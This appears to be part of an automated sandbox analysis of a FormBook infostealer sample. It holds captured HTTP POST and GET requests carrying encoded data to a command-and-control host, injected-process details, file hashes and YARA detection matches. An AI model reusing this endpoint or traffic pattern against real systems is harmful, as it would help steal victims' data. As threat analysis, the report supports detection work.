                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:55:34.513824940 CEST691INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:55:34 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 548
                                                                                              Connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              33192.168.2.650025103.224.182.242802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:39.966044903 CEST829OUTPOST /pp43/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.nobartv6.website
                                                                                              Origin: http://www.nobartv6.website
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.nobartv6.website/pp43/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6d 57 79 55 2f 72 32 54 6e 52 34 4f 43 34 6f 44 57 2f 38 6b 68 4b 35 71 71 76 73 35 67 41 52 5a 47 76 47 33 5a 72 2f 38 69 75 52 54 43 69 35 58 4d 33 68 72 50 78 6c 30 72 70 63 57 4e 41 47 6a 49 66 43 74 46 75 33 45 6d 37 65 78 4c 6b 68 70 4b 33 32 51 63 45 43 70 63 44 7a 69 31 6c 2f 6a 68 51 58 6b 38 45 46 6b 5a 51 6c 66 66 46 4c 77 4a 4f 71 4c 49 44 56 2f 56 71 64 77 70 39 53 6f 68 75 65 46 56 7a 42 4f 47 78 6e 79 54 51 7a 30 51 49 52 77 73 44 44 34 49 71 45 69 57 57 62 2b 45 44 71 7a 73 58 6a 44 4e 59 37 77 75 4b 49 78 35 52 4f 39 53 6d 56 42 57 73 39 74 52 31 2b 48
                                                                                              Data Ascii: I4ET5=ywbiYQ/q4W1CmWyU/r2TnR4OC4oDW/8khK5qqvs5gARZGvG3Zr/8iuRTCi5XM3hrPxl0rpcWNAGjIfCtFu3Em7exLkhpK32QcECpcDzi1l/jhQXk8EFkZQlffFLwJOqLIDV/Vqdwp9SohueFVzBOGxnyTQz0QIRwsDD4IqEiWWb+EDqzsXjDNY7wuKIx5RO9SmVBWs9tR1+H
                                                                                              Oct 8, 2024 15:55:40.590358019 CEST876INHTTP/1.1 200 OK
                                                                                              date: Tue, 08 Oct 2024 13:55:40 GMT
                                                                                              server: Apache
                                                                                              set-cookie: __tad=1728395740.6411101; expires=Fri, 06-Oct-2034 13:55:40 GMT; Max-Age=315360000
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              content-length: 581
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              connection: close
                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                                                              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              34192.168.2.650026103.224.182.24280
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:43.696643114 CEST853OUTPOST /pp43/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.nobartv6.website
                                                                                              Origin: http://www.nobartv6.website
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.nobartv6.website/pp43/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 6c 5a 66 4e 65 33 4c 5a 48 38 6c 75 52 54 4a 43 35 53 43 58 67 47 50 32 74 38 72 6f 77 57 4e 41 36 6a 49 65 79 74 46 64 66 4c 33 37 65 7a 43 45 68 6e 46 58 32 51 63 45 43 70 63 43 58 4d 31 6a 58 6a 67 6c 66 6b 2b 6c 46 72 52 77 6c 59 50 31 4c 77 4e 4f 71 50 49 44 56 4a 56 72 42 65 70 34 65 6f 68 73 47 46 57 69 42 4a 64 68 6e 34 64 77 7a 69 5a 35 34 72 72 7a 4f 45 50 71 4d 50 4b 31 72 4f 42 31 72 70 77 6b 6a 67 66 49 62 79 75 49 51 44 35 78 4f 58 51 6d 74 42 45 37 78 4b 65 42 62 6b 35 4c 63 58 66 51 4b 36 32 4d 59 2f 63 6e 42 69 34 45 35 75 4f 51 3d 3d
                                                                                              Data Ascii: I4ET5=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThylZfNe3LZH8luRTJC5SCXgGP2t8rowWNA6jIeytFdfL37ezCEhnFX2QcECpcCXM1jXjglfk+lFrRwlYP1LwNOqPIDVJVrBep4eohsGFWiBJdhn4dwziZ54rrzOEPqMPK1rOB1rpwkjgfIbyuIQD5xOXQmtBE7xKeBbk5LcXfQK62MY/cnBi4E5uOQ==
                                                                                              Oct 8, 2024 15:55:44.298182011 CEST876INHTTP/1.1 200 OK
                                                                                              date: Tue, 08 Oct 2024 13:55:44 GMT
                                                                                              server: Apache
                                                                                              set-cookie: __tad=1728395744.6678593; expires=Fri, 06-Oct-2034 13:55:44 GMT; Max-Age=315360000
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              content-length: 581
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              connection: close
                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                                                              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              35192.168.2.650027103.224.182.24280
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:46.245667934 CEST1866OUTPOST /pp43/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.nobartv6.website
                                                                                              Origin: http://www.nobartv6.website
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.nobartv6.website/pp43/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 64 5a 44 75 57 33 5a 4f 54 38 6b 75 52 54 41 69 35 54 43 58 68 45 50 77 46 34 72 6f 4d 47 4e 47 2b 6a 4a 39 71 74 4f 4d 66 4c 75 72 65 7a 64 55 68 6d 4b 33 33 4b 63 45 53 74 63 44 6e 4d 31 6a 58 6a 67 69 76 6b 33 55 46 72 58 77 6c 66 66 46 4c 38 4a 4f 71 6a 49 44 4e 5a 56 6f 74 67 6f 4d 69 6f 68 4d 57 46 47 41 5a 4a 52 68 6e 2b 61 77 79 68 5a 35 6b 4f 72 7a 54 39 50 70 51 6c 4b 32 33 4f 43 69 65 4f 74 6c 44 50 44 49 33 70 2f 6f 64 69 77 47 36 7a 49 51 70 4d 43 4b 46 69 63 46 4c 79 38 66 77 49 55 42 4c 35 32 64 49 44 63 51 4e 79 73 47 73 58 59 58 4d 50 4b 2b 66 34 35 49 4a 34 73 4d 36 35 59 66 47 4e 33 56 4c 4f 49 53 33 65 50 56 53 74 7a 32 4a 68 78 61 31 44 7a 31 4b 69 5a 44 6c 6c 43 4f 37 62 77 4a 52 58 55 62 55 32 75 62 79 36 69 37 4d 49 38 46 78 4d 64 4a 52 61 6e 66 4d 48 4a 64 30 31 52 63 38 48 2f 30 69 50 77 65 6d 67 78 57 74 2b 73 35 59 37 54 5a 47 74 [TRUNCATED]
                                                                                              Data Ascii: I4ET5=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThydZDuW3ZOT8kuRTAi5TCXhEPwF4roMGNG+jJ9qtOMfLurezdUhmK33KcEStcDnM1jXjgivk3UFrXwlffFL8JOqjIDNZVotgoMiohMWFGAZJRhn+awyhZ5kOrzT9PpQlK23OCieOtlDPDI3p/odiwG6zIQpMCKFicFLy8fwIUBL52dIDcQNysGsXYXMPK+f45IJ4sM65YfGN3VLOIS3ePVStz2Jhxa1Dz1KiZDllCO7bwJRXUbU2uby6i7MI8FxMdJRanfMHJd01Rc8H/0iPwemgxWt+s5Y7TZGtQqYf5WL7J5IgaG/NAYAoCADzs+c/9Bjd6+/6yhoxsTosTIzDfnpa+abYmz2kymbt6cO4lC8ybrj0hBKE8GqkCkOD31iuV6gMlSlmbtnLHqHsEsLrY+xYy2EDg7vbumIibrl1d8tASpA9SEhQ7kkjnYYwkIkVEEvuglpmiewFjcFghpeRMIFkagfsYagM3ah1cKUPZftUlpYGwr6+RtvBqNlyqkIKgFcXWdPpJeWhhTgyXD7BPp7RUxF+d2X3tytdB9HLZTnjgEnp0PTWEeWjXegzZXv6G23SDz10pZtyZVMVKcWyCED3bgUN3Vbc0V395xb+f9Lrkch3eT9xbWKjCiWu0AuwkvkGliKL4jBS8jGaLamnJ2eacub3nTCrdhZfwpttE5KeMQDUom6j0fTeCW0JZ54SmIwPfsS5CdcbqeLhNBNxwYzDXbReS1GmdMo0MCkKykqHEqJxACmWmOS+n2aNu0ioV6e2muvPI84RvkAhfUfKHAnJHmCNxohrksezVFUfx6RZXTfg6YWzDBo/vNbxGmWHU1S4koBFu6HH67nownuqvmwJucfRHCOD0zLb/15cY+BB/P7fpK2uh5zQVNnvxLn/y3bKcykBDYLXF59mtMaOxnW55iihi8c6LfU8baGMhesNvZZmHX13jts9rJagHSuR1T2GRj [TRUNCATED]
                                                                                              Oct 8, 2024 15:55:46.851593971 CEST876INHTTP/1.1 200 OK
                                                                                              date: Tue, 08 Oct 2024 13:55:46 GMT
                                                                                              server: Apache
                                                                                              set-cookie: __tad=1728395746.2134099; expires=Fri, 06-Oct-2034 13:55:46 GMT; Max-Age=315360000
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              content-length: 581
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              connection: close
                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                                                              Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              36192.168.2.650028103.224.182.24280
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:55:48.788316965 CEST569OUTGET /pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkSAI62mQlNqC9c=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.nobartv6.website
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:55:49.395872116 CEST1236INHTTP/1.1 200 OK
                                                                                              date: Tue, 08 Oct 2024 13:55:49 GMT
                                                                                              server: Apache
                                                                                              set-cookie: __tad=1728395749.5537822; expires=Fri, 06-Oct-2034 13:55:49 GMT; Max-Age=315360000
                                                                                              vary: Accept-Encoding
                                                                                              content-length: 1556
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              connection: close
                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 2f 70 70 34 33 2f 3f 49 34 45 54 35 3d 2f 79 7a 43 62 6c 72 4a 73 45 52 75 71 67 7a 7a 76 70 62 46 68 45 5a 58 50 72 45 64 52 4f 67 75 2b 36 5a 68 38 2f 38 59 71 42 30 31 46 75 4f 2b 44 4c 58 66 67 63 6c 76 48 6e 74 33 43 57 4e 75 47 6c 6c 58 74 70 30 38 47 6e 4c 51 4b 4a 32 69 43 74 6a 56 76 37 76 44 46 41 6c 53 4c 45 66 50 4d 45 4f 70 49 69 50 76 2b 7a 50 35 6d 78 65 53 38 6c 68 2b 5a 6b 31 32 4a 6b 53 41 [TRUNCATED]
                                                                                              Data Ascii: <html><head><title>nobartv6.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.nobartv6.website/pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkSAI62mQlNqC9c=&5xn03=7vMx2HlPWl&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></hea
                                                                                              Oct 8, 2024 15:55:49.395889044 CEST592INData Raw: 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74
                                                                                              Data Ascii: d><body bgcolor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.nobartv6.website/pp43/?I4ET5=/yzCblrJsERuqgzzvpbFhEZXPrEdROgu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVv7vDFAlSLEfPMEOpIiPv+zP5mxeS8lh+Zk12JkS


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:09:52:34
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Users\user\Desktop\jpdy1E8K4A.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\jpdy1E8K4A.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'401'503 bytes
                                                                                              MD5 hash:473DF0A675CEABA5A7C27F100E7D7491
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:09:52:35
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\jpdy1E8K4A.exe"
                                                                                              Imagebase:0xe80000
                                                                                              File size:46'504 bytes
                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2356846252.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2361090040.0000000007C30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2357806281.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:09:52:48
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe"
                                                                                              Imagebase:0x490000
                                                                                              File size:140'800 bytes
                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3984182354.00000000040E0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3991557809.0000000007130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:09:52:51
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                              Imagebase:0x370000
                                                                                              File size:22'016 bytes
                                                                                              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
